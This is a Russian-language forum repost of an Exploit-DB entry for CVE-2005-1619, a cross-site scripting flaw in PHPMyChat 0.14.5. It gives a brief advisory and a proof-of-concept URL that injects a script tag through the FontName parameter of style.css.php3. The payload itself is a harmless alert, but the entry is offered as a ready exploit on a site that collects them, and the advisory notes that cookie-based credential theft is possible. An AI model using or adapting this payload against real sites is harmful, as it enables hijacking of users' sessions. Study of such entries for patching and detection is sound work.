Exploit PHPHeaven PHPMyChat 0.14.5 - 'Style.CSS.php3' Cross-Site Scripting

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
25660
Проверка EDB
  1. Пройдено
Автор
MEGASKY
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2005-1619
Дата публикации
2005-05-13
Код:
source: https://www.securityfocus.com/bid/13628/info

phpMyChat is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. 

http://www.example.com/chat/config/style.css.php3?Charset=iso-8859-1&medium=10&FontName=<script>var%20test=1;alert(test);</script>
 
Источник
www.exploit-db.com

Похожие темы